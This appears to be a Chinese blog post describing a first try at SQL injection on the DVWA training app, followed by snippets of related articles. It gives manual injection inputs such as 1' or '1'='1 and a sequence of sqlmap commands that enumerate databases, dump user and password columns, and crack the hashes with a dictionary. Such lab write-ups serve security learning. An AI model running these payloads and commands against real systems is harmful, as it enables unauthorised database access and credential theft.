2. 程式人生 > 實用技巧 >SQL注入以及sqlmap初體驗

SQL注入以及sqlmap初體驗

阿新 發佈:2020-08-17
  • 隨便輸入1,出現結果。

  • 輸入 1' ,報錯,看來存在sql注入漏洞。

  • 輸入1' or '1'='1,果然彈出了所有的資訊。

  • 下面利用sqlmap工具

  • 輸入

sqlmap.py -u "url"

  • 顯示302重定向至登陸介面,看來需要帶上cookie,F12選擇網路或者burp抓包獲取cookie。
  sqlmap.py -u "~~~" --cookie "~~~"

  • 下面用--dbs得到所有資料庫
  sqlmap.py -u "~~~" --cookie "~~~" --dbs

  • --tables -D "dvwa" 得到dvwa資料庫下的表

  • --columns -T "users" -D "dvwa"引數得到dvwa資料庫下面的表users下面的列(columns)

  • 以及快接近到最重要的部分了,可以看到以及出現了user和密碼。
  • --dump -C "user_id,user,password" -T "user" -D "dvwa"引數得到dvwa資料庫下面的表users---下面的列(Columns)的具體值,即某(些)屬性的具體值。
sqlmap.py -u "~~~" --cookie "~~~" --dump -C "user_id,user,password" -T "user" -D "dvwa"

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
是否要將雜湊儲存到臨時檔案中,以便最終使用其他工具進一步處理[y/N]

  • 我選的n

do you want to crack them via a dictionary-based attack? [Y/n/q]
是否想通過基於字典的攻擊來破解它們[Y/n/q]

  • Y

what dictionary do you want to use?
用什麼字典來破解
[1] default dictionary file 'D:\ctftools\sqlmap\sqlmap\sqlmapproject-sqlmap-d4d83b2\data\txt\wordlist.tx_' (press Enter)
預設字典檔案'~~~'(按下回車)
[2] custom dictionary file
自定義字典
[3] file with list of dictionary files
帶有字典檔案列表的檔案

  • 1

  • 成功!

相關推薦

SQL注入以及sqlmap體驗

隨便輸入1,出現結果。 輸入 1\' ,報錯,看來存在sql注入漏洞。 輸入1\' or \'1\'=\'1,果然彈出了所有的資訊。

SQL注入工具 sqlmap

sqlmap是一個開源的滲透測試工具,可以用來進行自動化檢測,利用SQL注入漏洞,獲取資料庫伺服器的許可權。它具有功能強大的檢測引擎,針對各種不同型別資料庫的滲透測試的功能選項,包括獲取資料庫中儲存的資料,訪問

sql注入sqlmap

一、Sql注入簡介 Sql 注入攻擊是通過將惡意的 Sql 查詢或新增語句插入到應用的輸入引數中,再在後臺 Sql 伺服器上解析執行進行的攻擊,它目前黑客對資料庫進行攻擊的最常用手段之一。

例項介紹SQL注入以及如何解決

前言 SQL注入即是指web應用程式對使用者輸入資料的合法性沒有判斷或過濾不嚴,攻擊者可以在web應用程式中事先定義好的查詢語句的結尾上新增額外的SQL語句,在管理員不知情的情況下實現非法操作,以此來實現欺騙資料庫

sql注入7:sqlmap簡單操作

一、sqlmap是什麼,具有什麼特點?   sqlmap是開源的自動化SQL注入工具,由Python寫成,具有如下特點:

sql注入9:sqlmap常用引數2

接上文: 九、身份認證   引數:“-auth-type”和“-auth-cred”   這些引數用於進行身份認證。“-auth-type”用於指定認證方式,支援以下三種身份認證方式:

SQL注入詳解以及案例與防護

SQL注入是每個基於資料庫開發的研發人員,都必須要注意到的問題。 1.SQL注入的根本原因,

sqlmap繞過d盾_姿勢分享——SQL注入bypass D盾

技術標籤:sqlmap繞過d盾 首先感謝兄弟們的支援與關注,我們的成長離不開您的陪伴

sql注入談運維基礎建設 - 使用 sqlmap 根據變數位置定點注入 restful api

sqlmap 是一款強勁自動化的 sql 注入工具, 使用 python 開發, 支援 python 2/3。 RESTful API 規則幾乎是當前開發執行的預設規範。

mybatis的萬能map引數的使用以及模糊查詢、sql注入問題

技術標籤:mybatis入門mybatissql 萬能map引數 可能進公司用的比較多,欄位少的表很少用map。 在Mybatis裡我們的一個專案裡涉及的表有很多欄位的話,便於操作,我們每次寫的方法裡傳入的引數可以設定為map型別的

SQL注入中的讀些檔案函式以及讀些檔案條件

讀(匯出)檔案函式 函式名稱 load_file(file_name) 使用條件 使用者有許可權讀取 && 檔案是可讀的

Spark原始碼系列(九)Spark SQL體驗之解析過程詳解

好久沒更新部落格了,之前學了一些R語言和機器學習的內容,做了一些筆記,之後也會放到部落格上面來給大家共享。一個月前就打算更新Spark Sql的內容了,因為一些別的事情耽誤了,今天就簡單寫點,Spark1.2馬上就要出

Xcode 11 體驗

今天更新了 Xcode 11 感覺很不錯(主要很多陌生的東西,但是很有意思)!這裡跟大家一起分享一下!前面翻譯過一篇官方文件: 但是大家紛紛反饋看不懂,其實大家更希望看到就是一些帶著更新去操作的東西。趁著最新更

跳躍表之體驗

背景 在查詢演演算法的解決方案中,即根據 key 來查詢其所在的位置,主要思想一般是基於兩種,一種是基於平衡樹,還有一種是基於雜湊表。

SpringCloud與Seata分散式事務體驗

在本篇文章中我們在SpringCloud環境下通過使用Seata來模擬使用者購買商品時由於使用者餘額不足導致本次訂單提交失敗,來驗證下在MySQL資料庫內事務是否會回滾。

sql注入原理及防範

前言         sql注入是一種危險係數較高的攻擊方式,現在由於我們持久層框架越來越多,大部分框架會處理這個問題,因此導致我們對它的關注度越來越少了。最近部門在整理安全漏洞時,提到了一些關於sql注入的修改

GraphQL 與 Spring Boot 的體驗

感謝您的閱讀,本文由 楊斌的部落格 版權所有。 如若轉載,請註明出處:楊斌的部落格(y0ngb1n.github.io/a/getting-s…)

Kubernetes體驗:Minikube

本文會指引讀者完成minikube及其相關工具的安裝,通過一個單節點的kubernetes叢集來進行學習和體驗

詳解SQL注入--安全(二)

如果此文章有什麼錯誤,或者您有什麼建議,歡迎隨時聯絡我,謝謝! 寫在前面:在前兩天初學SQL注入的基礎上,繼續在Metasploitable-Linux環境下進行練習。

關於sql注入的簡要演示(入坑拋磚)

首先可能大家都會問什麼是sql? Sql是資料庫的一種型別,是用來儲存網站資料的。